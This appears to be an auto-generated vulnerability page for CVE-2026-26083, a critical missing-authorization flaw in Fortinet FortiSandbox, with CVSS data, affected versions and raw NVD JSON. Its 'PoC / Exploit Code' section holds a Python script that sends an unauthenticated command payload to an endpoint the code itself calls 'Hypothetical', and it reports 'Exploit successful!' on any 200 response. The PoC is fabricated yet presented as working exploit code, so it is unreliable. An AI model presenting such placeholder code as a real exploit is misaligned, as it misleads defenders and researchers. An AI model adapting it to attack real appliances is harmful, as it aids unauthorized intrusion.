Security Vulnerability Report
CVE-2026-26083 CVSS 9.8 CRITICAL

CVE-2026-26083

Published: 2026-05-12 18:16:40
Last Modified: 2026-05-12 18:57:02

Description

A missing authorization vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.2 through 5.0.5, FortiSandbox PaaS 23.4 all versions, FortiSandbox PaaS 23.3 all versions, FortiSandbox PaaS 23.1 all versions, FortiSandbox PaaS 22.2 all versions, FortiSandbox PaaS 22.1 all versions, FortiSandbox PaaS 21.4 all versions, FortiSandbox PaaS 21.3 all versions, FortiSandbox PaaS 5.0.0 through 5.0.1, FortiSandbox PaaS 4.4.5 through 4.4.8 may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiSandbox 5.0.0 - 5.0.1
FortiSandbox 4.4.0 - 4.4.8
FortiSandbox Cloud 5.0.2 - 5.0.5
FortiSandbox PaaS 23.4 (all versions)
FortiSandbox PaaS 23.3 (all versions)
FortiSandbox PaaS 23.1 (all versions)
FortiSandbox PaaS 22.2 (all versions)
FortiSandbox PaaS 22.1 (all versions)
FortiSandbox PaaS 21.4 (all versions)
FortiSandbox PaaS 21.3 (all versions)
FortiSandbox PaaS 5.0.0 - 5.0.1
FortiSandbox PaaS 4.4.5 - 4.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# Target configuration
target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
url = f"{target}/api/vulnerable_endpoint"  # Hypothetical endpoint based on description

# Malicious payload to execute a command (e.g., 'whoami')
payload = {
    "cmd": "whoami",
    "arg": "-u"
}
headers = {
    "User-Agent": "CVE-2026-26083-Exploit",
    "Content-Type": "application/json"
}

try:
    # Send unauthenticated HTTP request
    print(f"[*] Sending exploit request to {target}...")
    response = requests.post(url, json=payload, headers=headers, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Command output:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-136

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-26083",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:16:39.817",
    "lastModified": "2026-05-12T18:57:02.307",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A missing authorization vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.2 through 5.0.5, FortiSandbox PaaS 23.4 all versions, FortiSandbox PaaS 23.3 all versions, FortiSandbox PaaS 23.1 all versions, FortiSandbox PaaS 22.2 all versions, FortiSandbox PaaS 22.1 all versions, FortiSandbox PaaS 21.4 all versions, FortiSandbox PaaS 21.3 all versions, FortiSandbox PaaS 5.0.0 through 5.0.1, FortiSandbox PaaS 4.4.5 through 4.4.8 may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-136",
        "source": "[email protected]"
      }
    ]
  }
}
```